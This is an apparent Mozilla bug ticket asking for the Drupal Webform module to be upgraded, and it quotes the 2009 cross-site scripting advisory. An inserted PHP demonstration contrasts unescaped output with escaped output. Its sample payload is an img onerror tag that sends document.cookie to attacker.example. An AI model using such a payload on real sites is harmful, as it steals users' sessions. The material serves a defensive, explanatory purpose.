Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 WEBFORM

Status: RESOLVED FIXED
Product: Websites Graveyard
Component: spreadthunderbird.com
Priority: --
Severity: critical
Reported: 9 years ago
Last modified: 5 years ago

People

(Reporter: Paul Booker, Assigned: gozer)

(Reporter)

Description

9 years ago
Hi Gozer,

Would you upgrade our disabled webform module on stage / production so that we can't turn on a module which is a moderately critical security risk. I'll then update our Wiki, thanks.

 * Advisory ID: DRUPAL-SA-CONTRIB-2009-032
 * Project: Webform (third-party module)
 * Versions: 5.x, 6.x
 * Date: 2009-June-03
 * Security risk: Moderately critical
 * Exploitable from: Remote
 * Vulnerability: Cross-site scripting

-------- DESCRIPTION ---------------------------------------------------------

The Webform module provides a node type which is typically used to enable
site visitors to fill in questionnaires, contact or request/registration
forms, surveys, polls, or other forms on a Drupal site. When displaying the
results of Webform submissions, the module does not properly filter user
entered data, leading to a cross-site scripting [1] (XSS) vulnerability on
sites with a specific configuration of input formats that would normally be
safe. Such an attack carried out against a sufficiently privileged user may
lead a malicious user to gain administrator access to the site.
-------- VERSIONS AFFECTED ---------------------------------------------------

 * Versions of Webform for Drupal 5.x prior to 5.x-2.7
 * Versions of Webform for Drupal 6.x prior to 6.x-2.7

Drupal core is not affected. If you do not use the contributed Webform
module, there is nothing you need to do.
-------- SOLUTION ------------------------------------------------------------

Install the latest version:
 * If you use Webform for Drupal 5.x, upgrade to Webform 5.x-2.7 [2].
 * If you use Webform for Drupal 6.x, upgrade to Webform 6.x-2.7 [3].

See also the Webform project page [4].
-------- REPORTED BY ---------------------------------------------------------

David Rothstein [5]
-------- FIXED BY ------------------------------------------------------------

Nathan Haug (quicksketch [6]), and David Rothstein [7] of the Drupal Security
Team [8]
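The advisory above describes the vulnerability class (visitor-entered Webform data rendered into the results page without proper filtering) but not the exact code path. The following PHP is an added illustration of that class, not Webform's own code or the 2.7 fix: a constructed submission containing a script-bearing value is rendered into a results table once by raw concatenation and once through output escaping. The `check_plain()` stand-in is an assumption so the script runs outside Drupal; Drupal 6's real `check_plain()` is `htmlspecialchars()` with `ENT_QUOTES` and UTF-8 plus a UTF-8 validity check.

```php
<?php
// Added illustration of the advisory's vulnerability class (stored XSS via
// unescaped form submissions shown to an administrator). Not Webform code.

// Stand-in for Drupal 6's check_plain() so this runs as a plain PHP script.
// Assumption: Drupal's version additionally rejects invalid UTF-8.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
  }
}

// Constructed sample submission, as an anonymous visitor could enter it into
// a text field of a webform. The hostname is a placeholder.
$submission = array(
  'name'    => 'Alice',
  'comment' => '<img src=x onerror="document.location=\'http://attacker.example/?c=\'+document.cookie">',
);

// Vulnerable pattern: the submitted value is concatenated straight into the
// results markup. Whoever views the results page (usually a privileged user)
// has the payload executed in their browser, which is the escalation the
// advisory warns about.
function render_results_vulnerable(array $submission) {
  $rows = '';
  foreach ($submission as $field => $value) {
    $rows .= "<tr><td>$field</td><td>$value</td></tr>\n";
  }
  return "<table>\n$rows</table>\n";
}

// Hardened pattern: plain-text fields are escaped on output, so the payload
// is displayed literally instead of being parsed as HTML.
function render_results_fixed(array $submission) {
  $rows = '';
  foreach ($submission as $field => $value) {
    $rows .= '<tr><td>' . check_plain($field) . '</td><td>'
           . check_plain($value) . "</td></tr>\n";
  }
  return "<table>\n$rows</table>\n";
}

echo "--- vulnerable rendering ---\n";
echo render_results_vulnerable($submission);
echo "--- escaped rendering ---\n";
echo render_results_fixed($submission);
```

Run it with `php` from the command line and compare the two tables: the first contains a live `<img onerror=...>` element, the second contains `&lt;img src=x onerror=...&gt;`. The caveat the advisory raises about input formats applies to the hardened form too: escaping is only safe if the value is not afterwards passed through a filter configured to allow raw HTML, which is why a site's "normally safe" input-format setup can still be exploited when visitor data is routed through it.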
(Reporter)

Updated

9 years ago
Severity: normal → major
(Reporter)

Updated

9 years ago
Severity: major → critical
Summary: DRUPAL-SA-CONTRIB-2009-032 Webform → Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 Webform
(Reporter)

Comment 1

9 years ago
Can we push this through to stage / production, thanks
Summary: Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 Webform → Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 WEBFORM
(Reporter)

Updated

9 years ago
Assignee: nobody → gozer
(Assignee)

Comment 2

9 years ago
Build, packaged and updated in stage and production.

Please verify and close.
(Reporter)

Comment 3

9 years ago
Verified.

Thanks, Paul
(Reporter)

Updated

9 years ago
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → FIXED
Component: spreadthunderbird.com → spreadthunderbird.com
Product: Websites → Websites Graveyard